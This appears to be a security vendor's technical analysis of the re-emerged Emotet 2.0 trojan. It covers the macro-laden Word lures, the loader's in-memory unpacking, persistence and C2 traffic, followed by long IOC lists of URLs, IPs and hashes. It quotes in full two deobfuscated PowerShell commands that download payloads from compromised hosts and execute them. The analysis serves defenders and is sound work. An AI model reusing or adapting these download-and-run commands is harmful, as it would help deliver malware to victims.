Since it was first identified in 2014, the Emotet banking trojan has been a persistent threat that has affected over 1.6 million computers and led to millions of dollars in loss. However, in January 2021 a collaborative effort between law enforcement in several countries, coordinated by Europol and Eurojust, dismantled the operations of Emotet, which was followed by several arrests in Ukraine.
Despite the disruptions in their operations, within 9 months, in November 2021, new Emotet samples were discovered in the wild. Though the new variant of Emotet is very similar to the previous bot code, it differs in the encryption scheme used for command and control communications.
In this article, we delve into the technical aspects of the re-emerged Emotet malware dubbed Emotet 2.0.
Analyzed Samples
Emotet 2.0 has been analyzed based on the following samples:
Documents:
- 349d13ca99ab03869548d75b99e5a1d0
- eb02f3635fbe19caf518a59aceb753ed
PE Images:
- 4b957e4473826a37066f4489f5abbed4
Initial Access
After almost a year-long hiatus, the Emotet malware has returned to the threat landscape through spamming campaigns. Adversaries are using weaponized Microsoft Word document files to spread the infection.
As shown in the image below, users are tricked into clicking “Enable Content” to execute the malicious Macros that downloads Emotet malware hosted on various WordPress websites compromised by the attackers.
Having extracted the malicious Macros embedded in the document, we found that:
- The Macros are heavily obfuscated to hinder the analysis.
- After deobfuscation, we observed that the Macros execute the Powershell command on the victim system to fetch the Emotet payload from the attacker’s infrastructure.
- After analyzing multiple files, we observed that the campaign uses different PE image files, like executable and DLLs (Dynamic-link libraries), to spread the malware.
- While some campaigns leverage DLL files to deploy the malware, others use .exe files to deploy it.
The images below illustrate the different Powershell payloads from multiple malicious documents:
- Powershell payload that downloads DLL files
powershell $dfkj=“$strs=\”http://toupai80.com/wp-admin/C7TNEk/,http://phpnan.com/rajaship/AGV4lxu7XvcyjjvIZ29g/,http://alfadandoinc.com/67oyp/m55JgEVxA1SYr3dXpEJw/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/yuOeppNKhbJiW/,http://comtamutthang.com/wp-content/uploads/5U4OLMs/,http://ec2-54–206–92–66.ap-southeast-2.compute.amazonaws.com/licenses/yB2dXUFf3YYI9uAg/,http://riven3.online/wp-content/SFTwXTjrYTM/\“.Split(\”,\“);foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\”c:\programdata\\\“+$r1+\”.dll\“;Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\”c:\windows\syswow64\rundll32.exe\“;$a=$tpth+\”,f\“+$r2;Start-Process $fp -ArgumentList $a;break;}};”;IEX $dfkj |
When the payload is DLL, the campaign uses Rundll32 to execute an exported function Control_RunDLL to deploy the Emotet payload.
- Powershell payload that downloads .exe files:
powershell -e $M6hq9p5=((‘Q’+‘tx’)+(‘dzs’+‘h’));.(‘new’+‘-ite’+‘m’) $eNV:useRpROfILe\sqPgDfi\dQKGpwC\ -itemtype DIrEctorY;::“S`E`cURi`TYProt`OCOL” = ((‘tl’+‘s12,’+‘ ‘)+‘t’+(‘ls’+‘1’)+(‘1,’+‘ tls’));$Qfifov7 = ((‘E’+‘2937’)+‘a’+‘4y’);$Edgv38b=((‘Myu’+‘n’)+‘q’+‘wl’);$Vlxiw69=$env:userprofile+((‘y’+‘Ap’+‘S’+(‘q’+‘pgd’)+(‘fiyA’+‘pD’)+‘q’+(‘k’+‘gpwcyA’)+‘p’)-CREplaCE (‘yA’+‘p’),92)+$Qfifov7+(‘.e’+‘xe’);$Utute3w=((‘S_’+‘zyk’)+‘7r’);$By1b2vx=&(‘n’+‘e’+‘w-object’) neT.wEbcLiENt;$Mv5ki8y=((‘h’+‘ttp’+‘:/’)+‘/’+(‘fort’+‘c’)+(‘oll’+‘in’)+(‘sa’+‘thl’)+(‘e’+‘tef’)+‘ac’+‘t’+‘o’+‘ry’+‘.c’+‘om’+(‘/wp-a’+‘dm’+‘in’+‘/i/’)+(‘*h’+‘tt’)+‘p:’+‘/’+‘/’+‘g’+‘et’+‘m’+(‘i’+‘ng.c’)+‘om’+‘/’+‘fo’+‘ru’+‘m/’+(‘p’+‘/*h’)+‘t’+(‘tp://’+‘g’)+‘af’+‘f’+(‘a-‘+‘mu’)+(‘s’+‘ic.’)+(‘co’+‘m/c’)+(‘gi-‘+‘bi’)+‘n’+‘/’+(‘UM’+‘/’)+(‘*htt’+‘p’)+‘:/’+‘/f’+(‘ran’+‘k’+‘fur’)+‘te’+(‘lf’+‘a’)+(‘r’+‘ol’+‘i’+‘llo’+‘.com/las’)+(‘e’+‘u/c7’+‘/’)+‘*’+(‘htt’+‘p’+‘://evilnerd’)+‘.o’+‘rg’+(‘/cgi-‘+‘b’)+(‘in’+‘/nU’)+(‘i’+‘/*h’)+‘t’+‘t’+(‘p’+‘:/’)+(‘/ga’+‘p’)+‘e’+‘sm’+(‘m.or’+‘g/o’)+(‘l’+‘d/’+‘M/*ht’)+‘tp’+‘:/’+(‘/’+‘gr’)+(‘m’+‘l’+‘.net’)+(‘/w’+‘p’)+(‘/C’+‘/’)).“sPL`It”(42);$On3lyc7=((‘P’+‘ah’)+‘6y’+‘h1’);foreach($Dckyilg in $Mv5ki8y){try{$By1b2vx.“dOW`N`LoadfIlE”($Dckyilg, $Vlxiw69);$Qfdsif0=((‘M’+’06’)+‘3i’+‘n4’);If ((&(‘Get-It’+’em’) $Vlxiw69).“lEN`gth” -ge 32254) {&(‘Invo’+‘k’+‘e’+‘-Item’)($Vlxiw69);$N5d6_0z=((‘Y8’+‘e’)+‘v’+(‘2u’+‘t’));break;$Obf305o=((‘J51’+‘i’)+‘d’+‘oi’)}}catch{}}$Pyfnxkx=((‘K6ki5’+‘5’)+‘2’) |
When the payload is a .exe executable file, the Powershell payload fetches the .exe file from the attacker’s infrastructure and executes on the victim’s system.
Emotet Malware Payload
- The Win32API IsProcessorFeaturePresent is commonly used in malware for anti-debug purposes.
- The argument value 0xA is passed to the API to check if the SSE2 instruction set is available on the victim system. Here, 0xA represents the constant value: PF_XMMI64_INSTRUCTIONS_AVAILABLE.
- Systems that support the SSE2 instruction set can use special registers xmmn, where n can have values from 0 — 7.
- Later in the process the malware uses xmmn registers to transfer data.
Loading Mechanism
- The DLL/exe file dropped by the malicious document acts as a dropper to deploy the Emotet malware. The analyzed DLL has a PE image hidden inside it as shown in the image below:
- Here, the malware uses the SSE2 instruction set for data transfer, i.e. the xmmn registers transfer hidden payload bytes within the malware.
The code responsible for transferring hidden payload bytes within the malware
- The malware then allocates memory to dump the hidden Emotet payload using VirtualAlloc Win32 api.
- The argument 0x40 has a value of PAGE_EXECUTE_READWRITE, which sets the permission of the newly allocated memory to read, write, and execute.
- The malware copies the hidden PE image into an address starting from 0x10000000. The address of the newly allocated memory can be found in the EAX register, as shown below:
As seen in the image below, the memory permissions for the region 0x10000000 to 0x00028000 have been set to ERW (Execute, Read, Write).
- The malware uses the code seen below, to copy the PE image, segment by segment, into the newly allocated memory with Execute, Read, Write permission.
- After transfering the byte, the newly allocated memory has a PE image with its MZ header, and the segments are ready to be executed by the malware.
- The malware then transfers control to a hidden payload by calling the memory address 0x100143B3.
- The image below shows the value stored in the Stack, when the above call happens. The execution starts from address 0x100143B3 in the newly allocated memory.
- Subsequently, the Emotet malware is executed. The shellcode is polymorphic in nature as each set of shellcode bytes are encoded by XORing with a key value to evade signature based detection as shown in the image below. The basic functionalities of the shellcode are covered in the System Wide Activity section.
- Finally the Emotet shellcode exits from the system.
Extracting the Emotet Payload
- The PE image hidden in the loader has a hash value of 9DA12DAF87DFF61804EDF0ECE87E1DA2, which is PE image DLL32 and has no exported functions.
- The instructions in the DLL are dynamically decoded using XOR to evade detection.
- There are no hits on VirusTotal for this hash.
System-Wide Activity
- The Emotet malware spawns a new process of Rundll32 with a new command line. This is responsible for maintaining connection with the attacker’s C2 (Command and Control) server.
- In the new command line shown below, we can see the malware has already been able to write the file in C:\Users\<user>\AppData\Local\<Random_string>\<random>.<random_extension>. We have confirmed that the file written in this extension is the same as the initial file dropped from the malicious document.
- It is not in the nature of the Rundll32 system program to make network connections. However, because the malware is executed via Rundll32, we can see live traffic from it on the system, when it connects to the attacker’s Infrastructure.
- The persistence mechanism employed by Emotet is a classic technique that utilizes the Run registry key. As mentioned above, a PE image is written to: C:\Users\<user>\AppData\Local\<Random_string>\ directory as <random_string>.<random_extension>. After which, the Rundll32 is abused to run the exported function in the DLL.
Indicators of Compromise (IOCs)
URL | |
http://141.94.176.124/Loader_90563_1.dll | http://104.130.140.69:8080 |
http://122.129.203.163:443 | http://178.79.144.87:443 |
http://188.165.214.166:7080 | http://202.29.239.161:443 |
http://31.220.49.39:8080 | http://41.76.108.46:8080 |
http://51.178.186.134:443 | http://51.79.205.117:8080 |
http://51.91.142.158:80 |
IPv4 | ||||
141.94.176.124 | 87.120.8.170 | 51.91.142.158 | 218.101.110.3 | 178.79.144.87 |
98.0.159.122 | 87.120.8.112 | 51.79.205.117 | 217.165.237.42 | 178.134.47.166 |
97.83.40.67 | 87.120.8.109 | 51.68.138.110 | 209.33.231.203 | 178.128.222.53 |
97.107.134.115 | 87.120.8.101 | 51.210.242.234 | 207.246.112.221 | 177.67.137.111 |
95.110.160.239 | 87.120.37.77 | 51.178.61.60 | 204.174.223.210 | 170.130.55.98 |
94.28.78.200 | 87.120.37.231 | 51.178.186.134 | 202.179.185.203 | 167.71.11.125 |
93.48.80.198 | 87.120.37.183 | 50.21.183.143 | 201.172.31.95 | 164.68.99.3 |
93.188.167.97 | 87.120.37.122 | 5.189.150.29 | 200.7.198.138 | 156.19.152.218 |
92.38.128.47 | 87.120.254.96 | 49.248.217.170 | 200.236.218.62 | 154.79.251.172 |
91.92.109.73 | 87.120.254.6 | 45.79.80.198 | 200.114.247.160 | 154.79.244.182 |
91.92.109.189 | 87.120.254.51 | 45.63.36.79 | 198.199.70.22 | 144.91.110.219 |
91.92.109.14 | 87.120.254.252 | 45.36.99.184 | 194.36.28.26 | 142.93.218.86 |
91.92.109.138 | 87.120.254.234 | 45.116.106.45 | 194.190.18.122 | 142.44.247.57 |
91.92.109.136 | 87.120.254.178 | 41.76.108.46 | 192.99.150.39 | 14.102.188.227 |
91.92.109.10 | 87.120.254.158 | 37.57.82.112 | 191.36.151.129 | 117.54.140.98 |
91.83.88.122 | 86.97.10.14 | 36.91.186.235 | 190.93.208.53 | 117.220.229.162 |
91.243.125.5 | 85.88.174.94 | 36.67.109.15 | 190.152.4.202 | 113.160.37.196 |
91.207.28.33 | 80.6.192.58 | 31.173.137.49 | 189.147.174.121 | 110.172.137.20 |
91.178.126.51 | 80.211.40.191 | 31.173.137.47 | 189.135.21.162 | 103.77.205.102 |
91.121.134.180 | 79.143.186.143 | 31.173.137.39 | 187.19.167.233 | 103.36.126.221 |
89.107.190.111 | 77.232.163.203 | 31.13.195.32 | 186.97.172.178 | 103.150.68.124 |
87.97.178.92 | 75.176.235.182 | 31.13.195.152 | 186.32.3.108 | 103.146.232.154 |
87.121.52.247 | 74.63.218.139 | 31.13.195.145 | 186.225.119.170 | 103.109.247.10 |
87.121.52.230 | 69.64.50.41 | 31.13.195.13 | 185.99.2.197 | 107.170.4.227 |
87.121.52.173 | 67.207.95.35 | 31.13.195.129 | 185.9.187.10 | 142.4.219.173 |
87.120.8.245 | 67.205.162.68 | 31.13.195.108 | 185.242.89.198 | 158.69.118.130 |
87.120.8.241 | 64.251.25.156 | 27.5.4.111 | 185.242.88.63 | 206.189.150.190 |
87.120.8.177 | 54.39.98.141 | 24.28.12.23 | 184.74.99.214 | 52.73.70.149 |
87.120.8.171 | 54.37.70.105 | 23.253.208.162 | 181.176.174.139 | 54.191.98.150 |
File Hash – SHA256 | ||
fc0d549104f2c18619758a5ca56847c65e16981121dfebc50b9a8eebc886573b | f717350418d58d2ba6c0492794508bc7cd5d3cdfcb3c4334276dba94048863bf | f5aa35e755dc8ff542bcf50eb9274e9fc265b0ab9cdc2beb810cf4cbf67d3c64 |
f57b21a4d6338a3d3552216e1cd2a39cfdc58310bce524d8f63004ee71aa2938 | f227c59532fa2aad62305a79cac5e13019a7d969765758a86218b85b004a1ae8 | f026dea4f1aab9b7669b67c4a7ff577f949b581186ab2f6c1eb15431f2fa9fd7 |
f023bf21ed5a54f84d75aa8ec2c0f40628dca0443b0e07375b52a657af838e3c | ef4f5373736a876fbfa74f6e9904f6f23f9c052f3f474d3ba0638cafd518576a | ef2d965156a667d3959525747a5520a6e480cbffb195d7c58156c041f3789488 |
ef0ee0f3b035a9aff22171da5cb6ce2870aad3ff4482ff36dcc54e8ee9c9c4fe | edf90b6422680bf15e95c8ce3fea26162fca3cfdf8dbb6c04f253089c0f77438 | e427c37b0e27c236c191953965763f0a8c66b266d42d2fc37035e589aacb782a |
e383a83e1f5c3c207418d26d3bfd88fb176c4e83f54bc07b2c9c783e09e35a15 | df68d5f7df57a1109b6a3a1c7b7295ef427a8a2542cee5bc8654eab0aad97433 | dc38a213f9b252a7222852f29a475007f78666597c1849b115bfec0e1a0a9100 |
dc13a72e1e5325435158cc9151c2dc85a21b9f3f3e3bedc3f23a16ca8228dbd2 | d7ba34224a23a54ced6d118e44c2cdebc7365cae81e168aa6f3cb72b5467de83 | cd7484a0818f37a34a430a8b9a3c3b30d722bbe30e9765b76c65a2d98a62f45b |
ccda6d2b252f30164eb8947e2ec403bf84f023988e678cb91892a95bfc051131 | cc73ad809eeba4440454fce00ee8d2076a57c6a64761af465f8f34cdc385d183 | cc2a34aef14a925ef35c536f73d1a2e1e72d3e171050412c967fba5875f2b972 |
cb5ac045795644ed2f7aeadc1526f438375248bb6cdedf300015a1978245a32a | c9aaf815abe2d627ea9ac3ee7fa9fa62971a3710acd33a438a4581ee95af6742 | c952865b866eab0825e6957c56defcd77b28acdb42380a0068938e2ca596b433 |
c436e7c76e37650fe6c6efb6ffb5836bbce8b192c2b750bfcb0f089b255a0e0f | c3235d8500c49161130b852defb4963e68e78bd149714e7f7c850e9587357ab4 | c271b7e39c668f97767c6d7b70d76c96d120f441f73bd7c0b28a6644b02660f0 |
c199e4c4607e53ad448227314fa7f31d7464e9d4138446d32ddf7e1390a3e794 | bc1a988b403559ad5da8b393414bec3bbed8cc3016476d9dd63779947638b1c8 | bb7d79a6ab69448866dd319b9b9d1f74f99a57a722cd9cd3afda41800c726ed0 |
ba3b47d0e52f983be9c585e9b30f4af080249836cd7c9e1b401d19b7db7cf939 | b7bb028310c3e03f25ffb3955e2f9fd2018caaf2da268ed0eea2306981a9f0ce | b3f3ef5f6dea6df51144fa43a94472d2da7a2829475067546144215cf6f8f847 |
b243bf0122828c99bf083af2f324b5f336aa46769fd94349eb2a9828bbdefc86 | ad278f4cf2e1eaa01f4a77db435f66f15cd49e6a8e3af5f04998fbeff8277a6c | a77662ae07a265db6ebe7aadc028b17faa721f87709b90f63377382de597cd9f |
9d4d9beaaeeac9fa7c3e6dcbcfa13da3619a28d20ec820de8ee9a6bfe952c148 | 9c2148eb0d49971908766b1c9c1875b7e8a627347ed19458ff2f8fa2388275fb | 9b27642c57f9a8a49a9cf09088d18b7c1a114824471aa8a580cc86dcfa6cadca |
9af62bbd1381d9566f907d99a7cfc9f532936cddb04f359736aa4bd3231ad020 | 9721c3df9f18b63c21f81604cf7b0d1ae45e603eb9d6d85189298b7e39a6ba00 | 9192b2e2d5dca0cebe7e77f6413fc23edb2df7257f2282e39c932195106a242f |
918fb07d648cd5235b6361d30256c37c4bc07cd4c3312b713276d035e0004fa6 | 8d728385d57b0bcd128751ace9f7550c210e841a41ba366c09d8cbcd7831a32b | 8b04dae355b3552acb72f9fa011d24a588f5614862ec211c3007fbc7da2302e3 |
88e8fa38140a1a3f906fac5b9a526132e978cc9c2de05ee3b5a49ff8f312c03e | 86a6f7971fae83e42ff5af58c1364a66a9f40f0fbe6f88f536e8746aed0519bc | 850415df59de3c12790e28538eb622713095dff4fa7a3913ff0db670ffe7be55 |
84e9eff680264b95cbc8fe0bb3850a9c0ac11a9d0e33d867744ec720fcef875f | 83b01c1031a2f40d9d563363eded81373d19815ded57596bb467c06726429304 | 82f9d9279b752c4c7b6ca40c737a09b55e4be09d96093351bb6b0614f12d08ed |
82f9d9279b752c4c7b6ca40c737a09b55e4be09d96093351bb6b0614f12d08ed | 824a6047233e2ac4af1ec01470fa6c92aafeb4edbe50170ffcd8a71fbdaaf3d6 | 7c3fc23ce0f9dcc2538e4ebaff55f1a11a0dc4edd5db8630568991be900b3049 |
7b428765408589b1783d877924b1904c74036346a6d6561e064a50e68d25f9f3 | 7a36f90f9decaa862fad06b462cfe9756778e786345f84585fe0ce66e2a5398e | 77c941b5df7cb5ce65cbab1a8654ea3d051cc2040c970d1332f8e364e5c6ec86 |
77bfee9cb826154ed07a2d8aef0b58e434984185751a0c0b35d080f3d816bf0a | 77bdae696540c67e4c9fa5243667723191f2c7724280c4a566f0bdafa29b659c | 74d6cdf21a4541d70de74683717f720a7466b1dd198c750d9d1ecd822e189208 |
6d679474a78796803d07ce6fe31a215ac9f5de7e6cc4e29ccfff6cd809af2360 | 65b0db343f74c2d2df9af530ce27b7b4e80a9a4b644d6f422b139cbf787c87e8 | 633ecda615b83fdc196481ecbef852fdded72a17273a35d7c840a8b0c3223dc4 |
62bcc4f1d51e92b4bf4797acd41bd9bcb0d66750e5c90555f6cc5d0bfa105581 | 62792a0de7959a7e4352fecea08adc050e22c965f6bd100a246bde5fd8f0121d | 61761e3f9abe1ee6efbf6da1155b176e09e8a9b1d30185be156316ea85e1db72 |
5fef57576da8bcbb07d5858148f1fe0b70adddeed7394a4fa112ef9871b6b76d | 5fc0e6c51016ae8e1e9fc0d6d96a28833947ce0872b333ef39f42e218c49c7f5 | 5b5dde6104f330551dd9e704ceabb7252686d39c8d1438d2f7738845e4a56099 |
59f5ce0c5422c95f739c094cd177f1149d4f8d0d3091f32c959d0dad34e3da98 | 54533a4f2c942c589c93b8f494a28804b42a8ee049d292faff2a247172b89fce | 52cf80799ee7f97e6fc1554c69050939429af807291397f34fc904755f09c2f4 |
5246f80dc9da8cc6f40241f0846b0ba301604348005fe397704ec39b711c2fda | 51ed1a79f300dd22a2fd558296df74cd0ca182d5301d1b22a31189d2009fa5e9 | 4f952ede4194acdfad1a16a579306058db2f77a3b4237997f9232b89a2b4cb30 |
4dedc2bfa4657a52c66b190bcf4ff3b35d492bf13f1c8a6705078932e6a4883c | 4da56959d4d126c44efbb99be3da0edc21d2e530c91035f7e04d63184d13a4dd | 4a09037602a40f4537473e81e9d9b8836bdde8e31a739566198996bcbaf45f7c |
47db58b63bcaa028cd345209a11e93334c0c9aad2b895e8a9a72b0c20be8adb6 | 45aecf95b1011751b81a88542fac64c2a747c445cef48b90b24f6303ea0d09ad | 43207ec09c7b92db2af74bd29bab8cd0d8fa4db1a963b6aea43e05b0d0b4bab2 |
3dc904b04fb0178bed08752004daf9fe3023ba01f5c6a5466b3cf657deb2b1bd | 3d605a6edf9007ce53e65c78c62070afc7da2cd1658546fd2e119a4bc03fe52d | 3cb2d781894a8eddf2ba22509468ad2a930d129dab905b47c5c34a57fbbce6a9 |
3b940b1a3d79aeb998d24c750b1d8dd7b2813c0612ffaec14aff9c9761290483 | 3b51f9935edabda771bd7c33eba789c0552bff3240488e3daa4a1e7b39fb6e20 | 392075a20616a741c387567a1ee8f9fce2f6c3c49f00744a98a762c4376a24ed |
3710b6a12451de36d8743766a129677c0e6f3a95996fdb16819c4fc1503ce0ec | 36fcc3252115a11533c543d81f8acb92da975aebbf6593a75a5826765ab92653 | 36d4e39b92598a49a755d5473f1dfb2488f63c4cd7b8d52ac207c8586173850a |
369e3867e57f226e567138dcafaf920c71bfb5ab959c6415f36fc16df1a56a0e | 35347dd43af88f9adbbaff8dee84da9c6187bc3583246baa366c9dd6d25e7282 | 332db3f86eefa8b6b64d6a674534ba90eeb3ccdaf9a51bf8d96783a7eb022b14 |
2c3812c81ed37982aff0b5a0becf00dffa537da56acca8792c96740ea42b7df3 | 2b9ad1e926df4c7a6af565fff49e4f1b7c9fad97672de67aad273d8142d229c8 | 28ec007adeb419a28d66a9d8528506a2c08bc701f9df1647b7d2163b11a4ae1e |
2717ddf8dc06e896ac9301202571353e2fa23acb4c9ba5978196e74c62c46909 | 20e25627fab8de69bac4e94599fab2767df36438697cccfc48e8539649b6dcef | 1ede4a8965a495ac04b6fb26abffb5d8025798523f962120841bcb3a1292bd54 |
1ea47a5d3f11650fc755a28fe54e8ab6557b635145925c23e42fc5eda85e4b8a | 1e9345ee7d442805a04bf6bd5eefea8e5de05fde2b60f1362f5d0239d7631e5d | 160af42910e5519dd86e183ea1252c59036d58983fc39367dc90cde4dd628801 |
124449bd0b9097b454c35fa258bda625ff6ecf5bf6f1316d7abb46fad459a273 | 118aeefa04fb5338c15d7fa9fffa137fd3c1b6c86fb3b32fddf637b50aaa1c36 | 10404cf5a5d07c02578bfafd321aacefbf03760e1a8337ceeefe1258fc21fd1f |
100cc1e3bcc4f5ad7ee601ca99ecaf17bbcf4fbf3878d0375c87cee00dd24756 | 0e662c5e7cc88a55c15b44685eb78ba249e9164513baa865800e4e1e838bc5a9 | 0c11f41c35d25e43d218b2d6d9824c44fa0d145761a12c5bc7eda0716d59207b |
073e41ee489ae16d60361a9abff708d92df0d3a2a5f7a4d1b05ecfa3880cbead | 040760ffb0fb37f80a9654390879a12f036c614b5117f6fded7513db63d42641 | 02fba2b72a34c3316dc5bca2ac96691eff3f3ea79e257f2dcaa2df972472c9ff |
023549c2246838ebf7bbd91c2414de4950c3c0eaabb875e66e24baf410438aa6 |
File Hash – SHA1 | ||
6a45c49225a32a667e17ffe12178e050c3404ab7 | 224f101b5a67877e66c23506d16f592c410a85e0 | 06df357c67ea78924e376422056b8cc4deae856c |
File Hash – MD5 | ||
b6bb0076356aaf68866fb7e68c4a7490 | 4f174fc64f06938cc1b8c63f9333af6c | 10a161593b0105eae03b4883f6566dae |